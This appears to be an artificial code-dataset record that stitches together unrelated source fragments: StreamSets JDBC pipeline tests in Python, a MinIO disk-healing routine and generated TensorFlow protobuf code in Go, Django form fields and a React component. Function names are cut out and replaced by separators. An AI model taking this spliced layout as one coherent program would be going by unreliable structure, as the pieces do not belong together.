('DATETIME2', "'2004-05-23T14:25:10'", 'DATETIME', 1085322310000),
('DATETIMEOFFSET', "'2004-05-23 14:25:10.3456 -08:00'", 'DEPENDS_ON_VERSION', 'depends_on_version'),
('SMALLDATETIME', "'2004-05-23T14:25:10'", 'DATETIME', 1085322300000),
('TIME', "'14:25:10'", 'TIME', 51910000),
('BIT', "1", 'BOOLEAN', True),
('DECIMAL(5,2)', '5.20', 'DECIMAL', '5.20'),
('NUMERIC(5,2)', '5.20', 'DECIMAL', '5.20'),
('REAL', '5.20', 'FLOAT', '5.2'),
('FLOAT', '5.20', 'DOUBLE', '5.2'),
('TINYINT', '255', 'SHORT', 255),
('SMALLINT', '-32768', 'SHORT', -32768),
('INT', '-2147483648', 'INTEGER', '-2147483648'),
('BIGINT', '-9223372036854775807', 'LONG', '-9223372036854775807'),
('MONEY', '255.60', 'DECIMAL', '255.6000'),
('SMALLMONEY', '255.60', 'DECIMAL', '255.6000'),
('BINARY(5)', "CAST('Hello' AS BINARY(5))", 'BYTE_ARRAY', 'SGVsbG8='),
('VARBINARY(5)', "CAST('Hello' AS VARBINARY(5))", 'BYTE_ARRAY', 'SGVsbG8='),
('CHAR(5)', "'Hello'", 'STRING', 'Hello'),
('VARCHAR(5)', "'Hello'", 'STRING', 'Hello'),
('NCHAR(5)', "'Hello'", 'STRING', 'Hello'),
('NVARCHAR(5)', "'Hello'", 'STRING', 'Hello'),
('TEXT', "'Hello'", 'STRING', 'Hello'),
('NTEXT', "'Hello'", 'STRING', 'Hello'),
('IMAGE', "CAST('Hello' AS IMAGE)", 'BYTE_ARRAY', 'SGVsbG8='),
# ('GEOGRAPHY',"geography::STGeomFromText('LINESTRING(-122.360 47.656, -122.343 47.656 )', 4326)", 'BYTE_ARRAY', '5hAAAAEUhxbZzvfTR0DXo3A9CpdewIcW2c7300dAy6FFtvOVXsA='),
# ('GEOMETRY',"geometry::STGeomFromText('LINESTRING (100 100, 20 180, 180 180)', 0)", 'BYTE_ARRAY', 'AAAAAAEEAwAAAAAAAAAAAFlAAAAAAAAAWUAAAAAAAAA0QAAAAAAAgGZAAAAAAACAZkAAAAAAAIBmQAEAAAABAAAAAAEAAAD/////AAAAAAI='),
('XML', "'<a></a>'", 'STRING', '<a/>')
])
@pytest.mark.parametrize('use_table_origin', [True, False])
def test_jdbc_sqlserver_types(sdc_builder, sdc_executor, database, use_table_origin, sql_type, insert_fragment,
expected_type, expected_value):
"""Test all feasible SQL Server types."""
table_name = get_random_string(string.ascii_lowercase, 20)
connection = database.engine.connect()
try:
# Create table
connection.execute(f"""
CREATE TABLE {table_name}(
id int primary key,
data_column {sql_type} NULL
)
""")
# And insert a row with actual value
connection.execute(f"INSERT INTO {table_name} VALUES(1, {insert_fragment})")
# And a null
connection.execute(f"INSERT INTO {table_name} VALUES(2, NULL)")
builder = sdc_builder.get_pipeline_builder()
if use_table_origin:
origin = builder.add_stage('JDBC Multitable Consumer')
origin.table_configs = [{"tablePattern": f'%{table_name}%'}]
else:
origin = builder.add_stage('JDBC Query Consumer')
origin.sql_query = 'SELECT * FROM {0}'.format(table_name)
origin.incremental_mode = False
trash = builder.add_stage('Trash')
# As a part of SDC-10125, DATETIMEOFFSET is natively supported in SDC, and is converted into ZONED_DATETIME
if sql_type == 'DATETIMEOFFSET':
if Version(sdc_builder.version) >= Version('3.14.0'):
expected_type = 'ZONED_DATETIME'
expected_value = '2004-05-23T14:25:10.3456-08:00'
else:
expected_type = 'STRING'
expected_value = '2004-05-23 14:25:10.3456 -08:00'
# This unknown_type_action setting is required, otherwise DATETIMEOFFSET tests for SDC < 3.14 will fail.
origin.on_unknown_type = 'CONVERT_TO_STRING'
origin >> trash
pipeline = builder.build().configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
snapshot = sdc_executor.capture_snapshot(pipeline=pipeline, start_pipeline=True).snapshot
sdc_executor.stop_pipeline(pipeline)
assert len(snapshot[origin].output) == 2
record = snapshot[origin].output[0]
null_record = snapshot[origin].output[1]
        # Since we are controlling types, we want to check explicit values inside the record rather than the Python
# wrappers.
# TLKT-177: Add ability for field to return raw value
assert record.field['data_column'].type == expected_type
assert null_record.field['data_column'].type == expected_type
assert record.field['data_column']._data['value'] == expected_value
assert null_record.field['data_column'] == None
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
connection.execute(f"DROP TABLE {table_name}")
@sdc_min_version('3.12.0')
@database('sqlserver')
@pytest.mark.parametrize('on_unknown_type_action', ['CONVERT_TO_STRING', 'STOP_PIPELINE'])
def test_jdbc_sqlserver_on_unknown_type_action(sdc_builder, sdc_executor, database, on_unknown_type_action):
"""Test JDBC Multitable Consumer with MS-SQL server for the on_unknown_type action.
This is to verify SDC-12764.
    When the 'On Unknown Type' action is set to STOP_PIPELINE, the pipeline should stop with a StageException since it cannot convert the DATETIMEOFFSET field.
    When the 'On Unknown Type' action is set to CONVERT_TO_STRING, the pipeline should convert the unknown type to string and process the next record.
The pipeline will look like:
JDBC_Multitable_Consumer >> trash
"""
if Version(sdc_builder.version) >= Version('3.14.0'):
pytest.skip("Skipping SQLServer Unknown Type action check, since DATETIMEOFFSET field is now natively supported from SDC Version 3.14.0")
column_type = 'DATETIMEOFFSET'
INPUT_DATE = "'2004-05-23T14:25:10'"
EXPECTED_OUTCOME = OrderedDict(id=1, date_offset='2004-05-23 14:25:10 +00:00')
table_name = get_random_string(string.ascii_lowercase, 20)
connection = database.engine.connect()
pipeline_builder = sdc_builder.get_pipeline_builder()
# Setup Origin with specified unknown type action
jdbc_multitable_consumer = pipeline_builder.add_stage('JDBC Multitable Consumer')
jdbc_multitable_consumer.set_attributes(table_configs=[{"tablePattern": f'%{table_name}%'}],
on_unknown_type=on_unknown_type_action)
# Setup destination
    trash = pipeline_builder.add_stage('Trash')
# Connect the pipeline stages
jdbc_multitable_consumer >> trash
pipeline = pipeline_builder.build().configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
# Create table and add a row
connection.execute(f"""
CREATE TABLE {table_name}(
id int primary key,
date_offset {column_type} NOT NULL
)
""")
connection.execute(f"INSERT INTO {table_name} VALUES(1, {INPUT_DATE})")
try:
if on_unknown_type_action == 'STOP_PIPELINE':
# Pipeline should stop with StageException
with pytest.raises(Exception):
sdc_executor.start_pipeline(pipeline)
sdc_executor.stop_pipeline(pipeline)
status = sdc_executor.get_pipeline_status(pipeline).response.json().get('status')
assert 'RUN_ERROR' == status
else:
snapshot = sdc_executor.capture_snapshot(pipeline=pipeline, start_pipeline=True).snapshot
output_records = snapshot[jdbc_multitable_consumer].output
assert len(output_records) == 1
assert output_records[0].field == EXPECTED_OUTCOME
finally:
status = sdc_executor.get_pipeline_status(pipeline).response.json().get('status')
if status == 'RUNNING':
sdc_executor.stop_pipeline(pipeline)
logger.info('Dropping table %s in %s database ...', table_name, database.type)
connection.execute(f"DROP TABLE {table_name}")
@sdc_min_version('3.14.0')
@database('sqlserver')
def test_jdbc_sqlserver_datetimeoffset_as_primary_key(sdc_builder, sdc_executor, database):
"""Test JDBC Multitable Consumer with SQLServer table configured with DATETIMEOFFSET column as primary key.
The pipeline will look like:
JDBC_Multitable_Consumer >> trash
"""
INPUT_COLUMN_TYPE, INPUT_DATE = 'DATETIMEOFFSET', "'2004-05-23 14:25:10.3456 -08:00'"
EXPECTED_TYPE, EXPECTED_VALUE = 'ZONED_DATETIME', '2004-05-23T14:25:10.3456-08:00'
table_name = get_random_string(string.ascii_lowercase, 20)
connection = database.engine.connect()
pipeline_builder = sdc_builder.get_pipeline_builder()
jdbc_multitable_consumer = pipeline_builder.add_stage('JDBC Multitable Consumer')
jdbc_multitable_consumer.set_attributes(table_configs=[{"tablePattern": f'%{table_name}%'}])
    trash = pipeline_builder.add_stage('Trash')
jdbc_multitable_consumer >> trash
pipeline = pipeline_builder.build().configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
connection.execute(f"""
CREATE TABLE {table_name}(
dto {INPUT_COLUMN_TYPE} NOT NULL PRIMARY KEY
)
""")
connection.execute(f"INSERT INTO {table_name} VALUES({INPUT_DATE})")
try:
snapshot = sdc_executor.capture_snapshot(pipeline=pipeline, start_pipeline=True).snapshot
sdc_executor.stop_pipeline(pipeline)
assert len(snapshot[jdbc_multitable_consumer].output) == 1
record = snapshot[jdbc_multitable_consumer].output[0]
assert record.field['dto'].type == EXPECTED_TYPE
assert record.field['dto'].value == EXPECTED_VALUE
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
connection.execute(f"DROP TABLE {table_name}")
# Test for SDC-13288
@database('db2')
def test_jdbc_producer_db2_long_record(sdc_builder, sdc_executor, database):
"""Test that JDBC Producer correctly sends record when setting Custom Data SQLSTATE for db2 database instead of
throwing StageException. The pipelines reads a file with 5 records 1 by 1 having the last record being biggest
than the db2 table column size. That throws an error with an specific SQL Code (22001). Having that code in Custom
Data SQLSTATE sends the last record to error.
The pipeline looks like:
directory_origin >> jdbc_producer
In order to create the file read by directory origin another pipeline is used that looks like:
dev_raw_data_source >> local_fs
"""
# Insert data into file.
tmp_directory = os.path.join(tempfile.gettempdir(), get_random_string(string.ascii_letters, 10))
csv_records = ['1,hello', '2,hello', '3,hello', '4,hello', '5,hellolargerword']
_setup_delimited_file(sdc_executor, tmp_directory, csv_records)
# Create directory origin.
pipeline_builder = sdc_builder.get_pipeline_builder()
directory = pipeline_builder.add_stage('Directory', type='origin')
directory.set_attributes(data_format='DELIMITED',
file_name_pattern='sdc*', file_name_pattern_mode='GLOB',
file_post_processing='DELETE', files_directory=tmp_directory,
batch_size_in_recs=1)
# Create jdbc producer destination.
    # Create table. DB2 internally sets table names to uppercase, so use ASCII uppercase directly.
table_name = get_random_string(string.ascii_uppercase, 20)
database.engine.execute(f'CREATE TABLE {table_name} (id VARCHAR(20) NOT NULL PRIMARY KEY, a VARCHAR(10));')
field_to_column_mapping = [dict(columnName='ID',
dataType='USE_COLUMN_TYPE',
field='/0',
paramValue='?'),
dict(columnName='A',
dataType='USE_COLUMN_TYPE',
field='/1',
paramValue='?')]
jdbc_producer = pipeline_builder.add_stage('JDBC Producer')
jdbc_producer.set_attributes(default_operation="INSERT",
schema_name=DEFAULT_DB2_SCHEMA,
table_name=table_name,
field_to_column_mapping=field_to_column_mapping,
stage_on_record_error='TO_ERROR',
data_sqlstate_codes=["22001"])
directory >> jdbc_producer
directory_jdbc_producer_pipeline = pipeline_builder.build(
title='Directory - JDBC Producer. Test DB2 sql code error').configure_for_environment(database)
sdc_executor.add_pipeline(directory_jdbc_producer_pipeline)
try:
snapshot = sdc_executor.capture_snapshot(directory_jdbc_producer_pipeline, start_pipeline=True, batch_size=1,
batches=5).snapshot
sdc_executor.stop_pipeline(directory_jdbc_producer_pipeline)
assert 5 == len(snapshot.snapshot_batches)
result = database.engine.execute(f'SELECT ID,A FROM {table_name};')
        data_from_database = sorted(result.fetchall(), key=lambda row: row[0])  # Order by id.
result.close()
# Assert records in database include from id=1 to id=4 excluding id=5. Columns => record[0] = id, record[1] = a.
assert data_from_database == [(record[0], record[1]) for record in
[unified_record.split(',') for unified_record in csv_records[:-1]]]
stage = snapshot.snapshot_batches[4][jdbc_producer.instance_name]
assert 1 == len(stage.error_records)
error_record = stage.error_records[0]
assert 'hellolargerword' == error_record.field['1']
assert 'JDBC_14' == error_record.header['errorCode']
assert 'SQLSTATE=22001' in error_record.header['errorMessage']
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
database.engine.execute(f'DROP TABLE {table_name}')
def _setup_delimited_file(sdc_executor, tmp_directory, csv_records):
"""Setup csv records and save in local system. The pipelines looks like:
dev_raw_data_source >> local_fs
"""
raw_data = "\n".join(csv_records)
pipeline_builder = sdc_executor.get_pipeline_builder()
dev_raw_data_source = pipeline_builder.add_stage('Dev Raw Data Source')
dev_raw_data_source.set_attributes(data_format='TEXT', raw_data=raw_data, stop_after_first_batch=True)
local_fs = pipeline_builder.add_stage('Local FS', type='destination')
local_fs.set_attributes(data_format='TEXT',
directory_template=tmp_directory,
files_prefix='sdc-${sdc:id()}', files_suffix='csv')
dev_raw_data_source >> local_fs
files_pipeline = pipeline_builder.build('Generate files pipeline')
sdc_executor.add_pipeline(files_pipeline)
# Generate some batches/files.
sdc_executor.start_pipeline(files_pipeline).wait_for_finished(timeout_sec=5)
return csv_records
# SDC-13556: Do not spin JDBC Destination and Tee Processor machinery for empty batches
@sdc_min_version('3.14.0')
@database('mysql')
@pytest.mark.parametrize('use_multi_row', [True, False])
def test_jdbc_tee_commits_on_empty_batches(use_multi_row, sdc_builder, sdc_executor, database):
"""Ensure that the JDBC Tee processor won't generate commits on empty batches. Since it's generally difficult
to create empty batches in SDC, we use scripting origin to generate them and then check commit timer (which also
contains count) to ensure that we don't generate excessive commits on the database."""
builder = sdc_builder.get_pipeline_builder()
table_name = get_random_string(string.ascii_lowercase, 20)
script = """
// First batch contains exactly one record
var batch = sdc.createBatch();
var record = sdc.createRecord('generated data');
record.value = {'name': 'A'};
batch.add(record);
batch.process("batch", "non-empty");
      // Send 1000 batches that will be empty
var step;
for (step = 0; step < 1000; step++) {
batch = sdc.createBatch();
batch.process("whatever", "batch-" + step);
}
"""
origin = builder.add_stage('JavaScript Scripting')
    origin.record_type = 'NATIVE_OBJECTS'
    origin.user_script = script
tee = builder.add_stage('JDBC Tee')
tee.default_operation = 'INSERT'
tee.field_to_column_mapping = [dict(columnName='name', field='/name', paramValue='?')]
tee.generated_column_mappings = [dict(columnName='id', field='/id')]
tee.table_name = table_name
tee.use_multi_row_operation = use_multi_row
trash = builder.add_stage('Trash')
origin >> tee >> trash
pipeline = builder.build().configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
table = _create_table(table_name, database)
try:
sdc_executor.start_pipeline(pipeline).wait_for_finished()
        # First, verify that the table has exactly one record with the expected values
result = database.engine.execute(table.select())
db = sorted(result.fetchall(), key=lambda row: row[1]) # order by id
result.close()
assert len(db) == 1
assert db[0][0] == 'A'
assert db[0][1] == 1
        # Second, we should see exactly 1001 batches generated by our scripting origin
history = sdc_executor.get_pipeline_history(pipeline)
assert history.latest.metrics.counter('pipeline.batchCount.counter').count == 1001
        # Then check how many commits we have generated to ensure that we don't have 1001 commits
expected_commits = 1 if use_multi_row else 2
assert history.latest.metrics.timer('custom.JDBCTee_01.Commit Timer.0.timer').count == expected_commits
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
@database
@sdc_min_version('3.15.0')
def test_multitable_quote_column_names(sdc_builder, sdc_executor, database):
"""
Ensure that we properly quote all table and column names when querying the database.
"""
table_name = "table_" + get_random_string(string.ascii_letters, 10)
offset_name = "column_" + get_random_string(string.ascii_letters, 10)
builder = sdc_builder.get_pipeline_builder()
origin = builder.add_stage('JDBC Multitable Consumer')
    origin.table_configs = [{"tablePattern": f'%{table_name}%'}]
origin.max_batch_size_in_records = 10
trash = builder.add_stage('Trash')
origin >> trash
pipeline = builder.build().configure_for_environment(database)
    # Work around STF behavior of upper-casing the table name configuration
origin.table_configs[0]["tablePattern"] = f'%{table_name}%'
metadata = sqlalchemy.MetaData()
table = sqlalchemy.Table(
table_name,
metadata,
sqlalchemy.Column(offset_name, sqlalchemy.Integer, primary_key=True, quote=True),
        quote=True
)
try:
logger.info('Creating table %s in %s database ...', table_name, database.type)
table.create(database.engine)
        logger.info('Adding a row into %s database ...', database.type)
connection = database.engine.connect()
connection.execute(table.insert(), [{offset_name: 1}])
sdc_executor.add_pipeline(pipeline)
snapshot = sdc_executor.capture_snapshot(pipeline=pipeline, start_pipeline=True).snapshot
        # We want to run for a few seconds to see if any errors show up (like they did in previous versions)
time.sleep(10)
sdc_executor.stop_pipeline(pipeline)
# There should be no errors reported
history = sdc_executor.get_pipeline_history(pipeline)
assert history.latest.metrics.counter('stage.JDBCMultitableConsumer_01.errorRecords.counter').count == 0
assert history.latest.metrics.counter('stage.JDBCMultitableConsumer_01.stageErrors.counter').count == 0
# And verify that we properly read that one record
assert len(snapshot[origin].output) == 1
assert snapshot[origin].output[0].get_field_data('/' + offset_name) == 1
finally:
logger.info('Dropping table %s in %s database...', table_name, database.type)
table.drop(database.engine)
@database
@sdc_min_version('3.0.0.0')
def test_jdbc_multitable_consumer_duplicates_read_when_initial_offset_configured(sdc_builder, sdc_executor, database):
"""
SDC-13625 Integration test for SDC-13624 - MT Consumer ingests duplicates when initial offset is specified
Setup origin as follows:
partitioning enabled + num_threads and num partitions > 1 + override offset column set
+ initial value specified for offset
Verify that origin does not ingest the records more than once (duplicates) when initial value for offset is set
Pipeline:
JDBC MT Consumer >> Trash
>= Pipeline Finisher (no-more-data)
"""
if database.type == 'Oracle':
pytest.skip("This test depends on proper case for column names that Oracle auto-uppers.")
src_table_prefix = get_random_string(string.ascii_lowercase, 6)
table_name = '{}_{}'.format(src_table_prefix, get_random_string(string.ascii_lowercase, 20))
pipeline_builder = sdc_builder.get_pipeline_builder()
jdbc_multitable_consumer = pipeline_builder.add_stage('JDBC Multitable Consumer')
jdbc_multitable_consumer.set_attributes(table_configs=[{
"tablePattern": f'{table_name}',
"enableNonIncremental": False,
"partitioningMode": "REQUIRED",
"partitionSize": "100000",
"maxNumActivePartitions": 5,
'overrideDefaultOffsetColumns': True,
'offsetColumns': ['created'],
'offsetColumnToInitialOffsetValue': [{
'key': 'created',
'value': '0'
}]
}])
jdbc_multitable_consumer.number_of_threads = 2
jdbc_multitable_consumer.maximum_pool_size = 2
trash = pipeline_builder.add_stage('Trash')
jdbc_multitable_consumer >> trash
finisher = pipeline_builder.add_stage("Pipeline Finisher Executor")
finisher.stage_record_preconditions = ['${record:eventType() == "no-more-data"}']
jdbc_multitable_consumer >= finisher
pipeline = pipeline_builder.build().configure_for_environment(database)
ONE_MILLION = 1000000
rows_in_table = [{'id': i, 'name': get_random_string(string.ascii_lowercase, 5), 'created': i + ONE_MILLION}
for i in range(1, 21)]
metadata = sqlalchemy.MetaData()
table = sqlalchemy.Table(
table_name,
metadata,
sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column('name', sqlalchemy.String(5)),
sqlalchemy.Column('created', sqlalchemy.Integer)
)
try:
logger.info('Creating table %s in %s database ...', table_name, database.type)
table.create(database.engine)
logger.info('Adding 20 rows into %s table', table_name)
connection = database.engine.connect()
connection.execute(table.insert(), rows_in_table)
connection.close()
sdc_executor.add_pipeline(pipeline)
snapshot = sdc_executor.capture_snapshot(pipeline=pipeline, batches=2, start_pipeline=True).snapshot
rows_from_snapshot = [(record.get_field_data('/name').value,
record.get_field_data('/id').value,
record.get_field_data('/created').value)
for batch in snapshot.snapshot_batches
for record in batch.stage_outputs[jdbc_multitable_consumer.instance_name].output]
expected_data = [(row['name'], row['id'], row['created']) for row in rows_in_table]
assert rows_from_snapshot == expected_data
finally:
logger.info('Dropping table %s in %s database...', table_name, database.type)
table.drop(database.engine)
| """Ensure that the Query consumer can resume where it ended and stop the pipeline when it reads all the data."""
if isinstance(database, OracleDatabase):
pytest.skip('This test does not support oracle and its upper casing of column names.')
metadata = sqlalchemy.MetaData()
table_name = get_random_string(string.ascii_lowercase, 20)
table = sqlalchemy.Table(
table_name,
metadata,
sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column('name', sqlalchemy.String(32))
)
pipeline_builder = sdc_builder.get_pipeline_builder()
origin = pipeline_builder.add_stage('JDBC Query Consumer')
origin.incremental_mode = True
origin.sql_query = 'SELECT * FROM {0} WHERE '.format(table_name) + 'id > ${OFFSET} ORDER BY id'
origin.initial_offset = '0'
origin.offset_column = 'id'
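    # Note (added for clarity, based on the configuration above): in incremental mode the ${OFFSET}
    # placeholder in sql_query is substituted with initial_offset ('0') on the first query and with the
    # last read value of offset_column ('id') afterwards, so each query only returns rows not yet consumed.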
trash = pipeline_builder.add_stage('Trash')
origin >> trash
finisher = pipeline_builder.add_stage("Pipeline Finisher Executor")
origin >= finisher
pipeline = pipeline_builder.build().configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
try:
logger.info('Creating table %s in %s database ...', table_name, database.type)
table.create(database.engine)
connection = database.engine.connect()
for i in range(len(ROWS_IN_DATABASE)):
            # Insert one row into the database
connection.execute(table.insert(), [ROWS_IN_DATABASE[i]])
snapshot = sdc_executor.capture_snapshot(pipeline=pipeline, start_pipeline=True).snapshot
assert len(snapshot[origin].output) == 1
assert snapshot[origin].output[0].get_field_data('/id') == i + 1
# TLKT-249: Add wait_for_finished to get_status object
sdc_executor.get_pipeline_status(pipeline).wait_for_status('FINISHED')
finally:
logger.info('Dropping table %s in %s database...', table_name, database.type)
table.drop(database.engine) |
background-newdisks-heal-ops.go | /*
* MinIO Cloud Storage, (C) 2019 MinIO, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package cmd
import (
"context"
"time"
"github.com/minio/minio/cmd/logger"
)
const defaultMonitorNewDiskInterval = time.Minute * 10
func initLocalDisksAutoHeal() {
go monitorLocalDisksAndHeal()
}
// monitorLocalDisksAndHeal - ensures that detected new disks are healed
// 1. Only the concerned erasure set will be listed and healed
// 2. Only the node hosting the disk is responsible to perform the heal
func | () {
// Wait until the object layer is ready
var objAPI ObjectLayer
for {
objAPI = newObjectLayerWithoutSafeModeFn()
if objAPI == nil {
time.Sleep(time.Second)
continue
}
break
}
z, ok := objAPI.(*xlZones)
if !ok {
return
}
ctx := context.Background()
var bgSeq *healSequence
var found bool
for {
bgSeq, found = globalBackgroundHealState.getHealSequenceByToken(bgHealingUUID)
if found {
break
}
time.Sleep(time.Second)
}
// Perform automatic disk healing when a disk is replaced locally.
for {
// Attempt a heal as the server starts-up first.
localDisksInZoneHeal := make([]Endpoints, len(z.zones))
for i, ep := range globalEndpoints {
localDisksToHeal := Endpoints{}
for _, endpoint := range ep.Endpoints {
if !endpoint.IsLocal {
continue
}
// Try to connect to the current endpoint
// and reformat if the current disk is not formatted
_, _, err := connectEndpoint(endpoint)
if err == errUnformattedDisk {
localDisksToHeal = append(localDisksToHeal, endpoint)
}
}
if len(localDisksToHeal) == 0 {
continue
}
localDisksInZoneHeal[i] = localDisksToHeal
}
// Reformat disks
bgSeq.sourceCh <- SlashSeparator
// Ensure that reformatting disks is finished
bgSeq.sourceCh <- nopHeal
time.Sleep(defaultMonitorNewDiskInterval)
var erasureSetInZoneToHeal = make([][]int, len(localDisksInZoneHeal))
// Compute the list of erasure set to heal
for i, localDisksToHeal := range localDisksInZoneHeal {
var erasureSetToHeal []int
for _, endpoint := range localDisksToHeal {
// Load the new format of this passed endpoint
_, format, err := connectEndpoint(endpoint)
if err != nil {
logger.LogIf(ctx, err)
continue
}
// Calculate the set index where the current endpoint belongs
setIndex, _, err := findDiskIndex(z.zones[i].format, format)
if err != nil {
logger.LogIf(ctx, err)
continue
}
erasureSetToHeal = append(erasureSetToHeal, setIndex)
}
erasureSetInZoneToHeal[i] = erasureSetToHeal
}
		// Heal all erasure sets that need healing
for i, erasureSetToHeal := range erasureSetInZoneToHeal {
for _, setIndex := range erasureSetToHeal {
err := healErasureSet(ctx, setIndex, z.zones[i].sets[setIndex])
if err != nil {
logger.LogIf(ctx, err)
}
}
}
}
}
| monitorLocalDisksAndHeal |
example.pb.go | // Code generated by protoc-gen-go. DO NOT EDIT.
// source: tensorflow/core/example/example.proto
/*
Package tensorflow is a generated protocol buffer package.
It is generated from these files:
tensorflow/core/example/example.proto
tensorflow/core/example/example_parser_configuration.proto
tensorflow/core/example/feature.proto
It has these top-level messages:
Example
SequenceExample
VarLenFeatureProto
FixedLenFeatureProto
FeatureConfiguration
ExampleParserConfiguration
BytesList
FloatList
Int64List
Feature
Features
FeatureList
FeatureLists
*/
package example
import proto "github.com/golang/protobuf/proto"
import fmt "fmt"
import math "math"
// Reference imports to suppress errors if they are not otherwise used.
var _ = proto.Marshal
var _ = fmt.Errorf
var _ = math.Inf
// This is a compile-time assertion to ensure that this generated file
// is compatible with the proto package it is being compiled against.
// A compilation error at this line likely means your copy of the
// proto package needs to be updated.
const _ = proto.ProtoPackageIsVersion2 // please upgrade the proto package
type Example struct {
Features *Features `protobuf:"bytes,1,opt,name=features" json:"features,omitempty"`
}
func (m *Example) Reset() { *m = Example{} }
func (m *Example) String() string { return proto.CompactTextString(m) }
func (*Example) ProtoMessage() {}
func (*Example) Descriptor() ([]byte, []int) { return fileDescriptor0, []int{0} }
func (m *Example) GetFeatures() *Features {
if m != nil {
return m.Features
}
return nil
}
type SequenceExample struct {
Context *Features `protobuf:"bytes,1,opt,name=context" json:"context,omitempty"`
FeatureLists *FeatureLists `protobuf:"bytes,2,opt,name=feature_lists,json=featureLists" json:"feature_lists,omitempty"`
}
func (m *SequenceExample) Reset() { *m = SequenceExample{} }
func (m *SequenceExample) String() string { return proto.CompactTextString(m) }
func (*SequenceExample) ProtoMessage() {}
func (*SequenceExample) Descriptor() ([]byte, []int) { return fileDescriptor0, []int{1} }
func (m *SequenceExample) GetContext() *Features {
if m != nil {
return m.Context
}
return nil
}
func (m *SequenceExample) GetFeatureLists() *FeatureLists {
if m != nil {
return m.FeatureLists
}
return nil
}
func init() {
proto.RegisterType((*Example)(nil), "tensorflow.Example")
proto.RegisterType((*SequenceExample)(nil), "tensorflow.SequenceExample")
}
func init() {
proto.RegisterFile("github.com/tensorflow/tensorflow/tensorflow/go/core/example/example.proto", fileDescriptor0)
}
var fileDescriptor0 = []byte{
// 190 bytes of a gzipped FileDescriptorProto
0x1f, 0x8b, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0xff, 0xe2, 0x52, 0x2d, 0x49, 0xcd, 0x2b,
0xce, 0x2f, 0x4a, 0xcb, 0xc9, 0x2f, 0xd7, 0x4f, 0xce, 0x2f, 0x4a, 0xd5, 0x4f, 0xad, 0x48, 0xcc,
0x2d, 0xc8, 0x81, 0xd3, 0x7a, 0x05, 0x45, 0xf9, 0x25, 0xf9, 0x42, 0x5c, 0x08, 0x65, 0x52, 0x38,
0xb5, 0xa4, 0xa5, 0x26, 0x96, 0x94, 0x16, 0x41, 0xb5, 0x28, 0x59, 0x73, 0xb1, 0xbb, 0x42, 0x24,
0x84, 0x0c, 0xb8, 0x38, 0xa0, 0x72, 0xc5, 0x12, 0x8c, 0x0a, 0x8c, 0x1a, 0xdc, 0x46, 0x22, 0x7a,
0x08, 0x43, 0xf4, 0xdc, 0xa0, 0x72, 0x41, 0x70, 0x55, 0x4a, 0x0d, 0x8c, 0x5c, 0xfc, 0xc1, 0xa9,
0x85, 0xa5, 0xa9, 0x79, 0xc9, 0xa9, 0x30, 0x53, 0xf4, 0xb8, 0xd8, 0x93, 0xf3, 0xf3, 0x4a, 0x52,
0x2b, 0x4a, 0xf0, 0x1a, 0x02, 0x53, 0x24, 0x64, 0xcb, 0xc5, 0x0b, 0x35, 0x2f, 0x3e, 0x27, 0xb3,
0xb8, 0xa4, 0x58, 0x82, 0x09, 0xac, 0x4b, 0x02, 0x8b, 0x2e, 0x1f, 0x90, 0x7c, 0x10, 0x4f, 0x1a,
0x12, 0xcf, 0x49, 0x87, 0x4b, 0x2c, 0xbf, 0x28, 0x1d, 0x59, 0x31, 0xd4, 0x9f, 0x4e, 0xbc, 0x50,
0x17, 0x05, 0x80, 0xfc, 0x59, 0x1c, 0xc0, 0xf8, 0x83, 0x91, 0x31, 0x89, 0x0d, 0xec, 0x69, 0x63,
0x40, 0x00, 0x00, 0x00, 0xff, 0xff, 0x98, 0x79, 0xef, 0x4a, 0x50, 0x01, 0x00, 0x00, | } |
|
util.go | package kons
import "regexp"
func | (path ...string) ([]*regexp.Regexp, error) {
var regs []*regexp.Regexp
for _, p := range path {
reg, err := regexp.Compile(p)
if err != nil {
return nil, err
}
regs = append(regs, reg)
}
return regs, nil
}
| PathToRegs |
forms.py | # -*- coding: utf-8 -*-
from django import forms
from django.core import validators
from modeltranslation.fields import TranslationField
class TranslationModelForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
super(TranslationModelForm, self).__init__(*args, **kwargs)
for f in self._meta.model._meta.fields:
if f.name in self.fields and isinstance(f, TranslationField):
del self.fields[f.name]
class NullCharField(forms.CharField):
"""
CharField subclass that returns ``None`` when ``CharField`` would return empty string.
"""
def to_python(self, value):
if value in validators.EMPTY_VALUES:
return None
return super(NullCharField, self).to_python(value)
class NullableField(forms.Field):
"""
Form field mixin that ensures that ``None`` is not cast to anything (like
the empty string with ``CharField`` and its derivatives).
"""
def to_python(self, value):
if value is None:
return value
return super(NullableField, self).to_python(value)
# Django 1.6
def | (self, initial, data):
if (initial is None and data is not None) or (initial is not None and data is None):
return True
return super(NullableField, self)._has_changed(initial, data)
| _has_changed |
tree-node-renderer.js | import React, { Component, Children, cloneElement } from 'react';
import PropTypes from 'prop-types';
import styles from './tree-node-renderer.scss';
class FileThemeTreeNodeRenderer extends Component {
render() {
const {
children,
listIndex,
swapFrom,
swapLength,
swapDepth,
scaffoldBlockPxWidth, // Delete from otherProps
lowerSiblingCounts,
connectDropTarget,
isOver,
draggedNode,
canDrop,
treeIndex,
treeId, // Delete from otherProps
getPrevRow, // Delete from otherProps
node, // Delete from otherProps
path, // Delete from otherProps
rowDirection, // Delete from otherProps
...otherProps
} = this.props;
return connectDropTarget(
<div {...otherProps} className={styles.node}>
{Children.map(children, child =>
cloneElement(child, {
isOver,
canDrop,
draggedNode,
lowerSiblingCounts,
listIndex,
swapFrom,
swapLength,
swapDepth,
})
